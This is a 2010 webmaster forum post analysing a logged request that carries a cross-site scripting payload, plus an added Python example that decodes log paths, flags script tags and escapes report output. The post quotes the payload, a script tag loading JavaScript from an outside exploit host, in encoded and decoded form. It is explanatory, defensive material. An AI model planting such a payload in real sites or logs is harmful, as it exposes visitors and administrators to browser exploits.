

SteveWh - 1:15 am on Jun 23, 2010 (gmt 0)


Somewhat disorganized comments based on a longer second look...

"/question/index?qid=20100223114447AAUSrnf" is the URL format of a Yahoo Answers question, and, oddly enough, when plugged into the correct website address of YA, it is a real existing question.


Some "thinking out loud"...

"GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E"
decodes to
GET /<sc<script src=http://example.com/x.js></script>

example.com is, as you said, an old exploit site from last summer. That JS code was injected into server pages or databases using various injection techniques, but that code was the injected content. In itself, it's not capable of compromising the server. That was done some other way. Once the code is in the site, its job is to launch browser exploits against people who visit the site.

But the request you found in your log is misguided if it was intended as an attack on the server. The page request itself is for an HTML script tag. An attack on your *server* would have to use something like PHP (a server side language) or SQL, not JavaScript (client side).

Maybe this URL with the JS in it is an attack against you, via statistics software. If a stats program puts that text in a report of pages requested, but fails to properly sanitize HTML tags, then that script could launch the exploit against *you*, just from viewing the page containing the text, and it wouldn't matter what response code the server gave for the request. The point was to get the request into the access log, that's all.

dstiles's suggestion about what could cause a Yahoo bot to make such a request sounds like a strong possibility to me. What if somebody placed in a forum or blog comment somewhere a link to your site, but the link contains that JavaScript code as a cross-site scripting attack? It seems at least conceivable that a crawler might run across the link and innocently follow it.

Maybe try doing web searches to try to find pages with links to your site and also with references to that malicious domain.
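The two points above, decoding the percent-encoded request and keeping an injected tag from executing when an access log is rendered as a report, as an added example (not code from the post or from WebmasterWorld). The log lines are constructed in Apache combined format, which is assumed for the parser.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache combined format). The first carries the
# encoded request quoted in the thread, the second is an ordinary 404.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jun/2010:01:15:00 +0000] "GET /%3Csc%3Cscript%20src=http://example.com/x.js%3E%3C/script%3E HTTP/1.1" 404 512 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp)"
203.0.113.9 - - [23/Jun/2010:01:16:00 +0000] "GET /question/index?qid=20100223114447AAUSrnf HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

# Leading fields of the combined format: client, ident, user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Matches an opening script tag anywhere in the decoded path.
SCRIPT_RE = re.compile(r'<\s*script\b', re.IGNORECASE)


def parse_line(line):
    """Parse one access-log line; decode the path and flag embedded script tags."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Percent-decoding is what turns %3Cscript%3E back into <script>.
    entry["decoded_path"] = unquote(entry["path"])
    entry["suspicious"] = bool(SCRIPT_RE.search(entry["decoded_path"]))
    return entry


def report_row(entry):
    """Render one entry as an HTML table row for a log-statistics page.

    Every field is HTML-escaped first, so an injected tag shows up as text
    in the report instead of running in the browser of whoever views it.
    """
    return "<tr><td>{ip}</td><td>{path}</td><td>{status}</td></tr>".format(
        ip=html.escape(entry["ip"]),
        path=html.escape(entry["decoded_path"]),
        status=html.escape(entry["status"]),
    )


def scan(log_text):
    """Parse all lines of a log; skip lines that do not match the format."""
    return [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
```

Running `scan(SAMPLE_LOG)` flags only the first line, and `report_row` on it yields `&lt;script` rather than a live tag.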


Thread source: http://www.webmasterworld.com/yahoo_search/4152420.htm